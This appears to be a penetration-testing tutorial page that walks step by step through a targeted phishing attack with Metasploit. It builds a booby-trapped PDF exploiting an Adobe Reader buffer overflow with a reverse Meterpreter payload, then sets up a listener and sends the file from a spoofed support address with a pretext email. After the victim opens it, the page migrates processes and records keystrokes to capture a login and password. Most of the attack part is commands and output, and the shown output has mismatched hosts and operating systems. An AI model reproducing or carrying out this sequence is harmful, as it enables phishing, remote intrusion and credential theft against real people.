MSF Binary Client Exploits
Categories:
5 minute read
Client-Side Exploits
In our previous articles, we have seen client-side exploits used for Windows and Linux. In this article, I want to look at another scenario.
Let’s assume that after a successful information gathering phase, we have reached the following conclusion about an IT company. The company;
The systems they use are state-of-the-art.
The IT department’s e-mail address: itdept@victim.com
Now, in this case, we want to reach a computer in the IT department and run a keylogger (keylogger). In this way, it will be possible to obtain useful information by recording the keys they press on the keyboard.
Let’s run Metasploit Framework with the msfconsole command. Let’s prepare a PDF document that will attract the IT department’s attention and that they will want to open and read. Remember that the document should have a security-related and logical title. It should also not be detected as malicious by antivirus software.
To prepare such a PDF document, we will use the Adobe Reader ‘util.printf()’ JavaScript Function Stack Buffer Overflow Vulnerability. For this, let’s load the exploit/windows/fileformat/adobe_utilprintf module.
msf > use exploit/windows/fileformat/adobe_utilprintf
msf exploit(adobe_utilprintf) > set FILENAME BestComputers-UpgradeInstructions.pdf
FILENAME => BestComputers-UpgradeInstructions.pdf
msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_utilprintf) > set LHOST 192.168.8.128
LHOST => 192.168.8.128
msf exploit(adobe_utilprintf) > set LPORT 4455
LPORT => 4455
msf exploit(adobe_utilprintf) > show options
Module options (exploit/windows/fileformat/adobe_utilprintf):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME BestComputers-UpgradeInstructions.pdf yes The file name.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.8.128 yes The listen address
LPORT 4455 yes The listening port
Exploit target:
Id Name
-- ----
0 Adobe Reader v8.1.2 (Windows XP SP3 English)
As can be seen from the output, you can set the FILENAME variable, that is, the file name, as you wish. In the Payload section, we need to set the LHOST and LPORT variables as the information of the computer that will be listened to. Then, let’s run the module with the exploit command.
msf exploit(adobe_utilprintf) > exploit
> Creating 'BestComputers-UpgradeInstructions.pdf' file...
> BestComputers-UpgradeInstructions.pdf stored at /root/.msf4/local/BestComputers-UpgradeInstructions.pdf
msf exploit(adobe_utilprintf) >
As you can see, the PDF file was created in /root/.msf4/local/. Let’s copy this file to the /tmp folder for easy access. Now, before sending our file to the relevant e-mail address, we need to run the listener module on our computer. For this, we will use the exploit/multi/handler module. We make sure that the LHOST and LPORT values are the same as the values we gave when creating the PDF file.
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 4455
LPORT => 4455
msf exploit(handler) > set LHOST 192.168.8.128
LHOST => 192.168.8.128
msf exploit(handler) > exploit
> Handler binding to LHOST 0.0.0.0
> Started reverse handler
> Starting the payload handler...
After activating the listener module, we need to somehow send the PDF file to itdept@victim.com. You can do this with the sample command below. You can also use other email sending methods. The command is provided as an example.
root@kali:~# sendEmail -t itdept@victim.com -f techsupport@bestcomputers.com -s 192.168.8.131 -u Important Upgrade Instructions -a /tmp/BestComputers-UpgradeInstructions.pdf
Reading message body from STDIN because the '-m' option was not used.
If you are manually typing **in **a message:
- First line must be received within 60 seconds.
- End manual input with a CTRL-D on its own line.
IT Dept,
We are sending this important file to all our customers. It contains very important instructions for **upgrading and securing your software. Please read and let us know **if **you have any problems.
Sincerely,
Best Computers Tech Support
Aug 24 17:32:51 kali sendEmail[13144]: Message input complete.
Aug 24 17:32:51 kali sendEmail[13144]: Email was sent successfully!
Let’s briefly explain the parameters used in this example command.
-t: TO, the recipient address. -f: FROM, the sender address. -s: SMTP Server IP address. -u: TTITLE, the subject of the mail. -a: ATTACHMENT, the attached file.
When you type the command and press ENTER, you can start writing the Text part of the e-mail. After the writing is complete, you can complete the process with the CTRL+D keys. Thus, the mail will be sent to the recipient address.
When the recipient receives this mail and checks it with the Antivirus program, it will get a harmless result, but when he clicks to open the file, even if he sees a blank screen, communication with the listening computer is actually established.
> Handler binding to LHOST 0.0.0.0
> Started reverse handler
> Starting the payload handler...
> Sending stage (718336 bytes)
session[*****] Meterpreter session 1 opened (192.168.8.128:4455 -> 192.168.8.130:49322)
meterpreter >
As you can see, when the PDF file is opened, the Meterpreter shell is opened. Now it is possible to run various commands on the other party’s computer. Finally, it is possible to record keystrokes by running the post/windows/capture/keylog_recorder module.
meterpreter > ps
Process list
**============**
PID Name Path
--- ---- ----
852 taskeng.exe C:\Windows\system32\taskeng.exe
1308 Dwm.exe C:\Windows\system32\Dwm.exe
1520 explorer.exe C:\Windows\explorer.exe
2184 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe
2196 VMwareUser.exe C:\Program FilesVMware\VMware Tools\VMwareUser.exe
3176 iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
3452 AcroRd32.exe C:\Program Files\AdobeReader 8.0\ReaderAcroRd32.exe
meterpreter > run post/windows/manage/migrate
> Running module against V-MAC-XP
> Current server process: svchost.exe (1076)
> Migrating to explorer.exe...
> Migrating into process ID 816
> New server process: Explorer.EXE (816)
meterpreter > sysinfo
Computer: OFFSEC-PC
OS: Windows Vista (Build 6000, ).
meterpreter > use priv
Loading extension priv...success.
meterpreter > run post/windows/capture/keylog_recorder
> Executing module against V-MAC-XP
> Starting the keystroke sniffer...
> Keystrokes being saved **in **to /root/.msf4/loot/20110323091836_default_192.168.1.195_host.windows.key_832155.txt
> Recording keystrokes...
You can check the recorded keys from the contents of the file 20110323091836_default_192.168.1.195_host.windows.key_832155.txt.
root@kali:~# cat /root/.msf4/loot/20110323091836_default_192.168.1.195_host.windows.key_832155.txt
Keystroke log started at Wed Mar 23 09:18:36 -0600 2011
Support, I tried to open his file 2-3 times with no success. I even had my admin and CFO tru y it, but no one can get it to open. I turned on the rmote access server so you can log in to fix this problem. Our user name is admin and password for that session is 123456. Call or email when you are done. Thanks IT Dept
As can be seen, the IT employee unknowingly revealed in his keystrokes that his username was admin and his password was 123456
Feedback
Was this page helpful?
Glad to hear it! Please tell us how we can improve.
Sorry to hear that. Please tell us how we can improve.